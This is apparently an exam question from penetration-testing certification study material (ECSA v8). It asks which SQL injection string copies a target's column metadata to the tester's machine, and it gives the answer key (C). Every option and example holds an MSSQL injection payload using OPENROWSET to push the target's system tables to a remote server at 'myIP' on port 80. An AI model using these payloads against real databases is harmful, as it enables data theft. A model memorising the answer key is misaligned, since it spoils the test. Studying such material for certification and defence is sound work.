A penetration tester tries to transfer the database from the target machine to a different
machine. For this, he uses OPENROWSET to link the target database to his own database,
replicates the database structure, and transfers the data to his machine via a connection
to the remote machine on port 80.
The query he used to transfer databases was:
'; insert into OPENROWSET
('SQLoledb','uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;', 'select * from
mydatabase..hacked_sysdatabases') select * from master.dbo.sysdatabases --
The query he used to transfer table 1 was:
'; insert into OPENROWSET('SQLoledb',
'uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;', 'select * from
mydatabase..table1') select * from database..table1 --
What query does he need in order to transfer the column?
A.
'; insert into
OPENROWSET('SQLoledb','uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;',
'select * from mydatabase..hacked_syscolumns') select * from
user_database.dbo.systables --
B.
'; insert into
OPENROWSET('SQLoledb','uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;',
'select * from mydatabase..hacked_syscolumns') select * from
user_database.dbo.sysrows --
C.
'; insert into
OPENROWSET('SQLoledb','uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;',
'select * from mydatabase..hacked_syscolumns') select * from
user_database.dbo.syscolumns --
D.
'; insert into
OPENROWSET('SQLoledb','uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;',
'select * from mydatabase..hacked_syscolumns') select * from
user_tables.dbo.syscolumns --
Answer: C, according to the ECSAv8 book.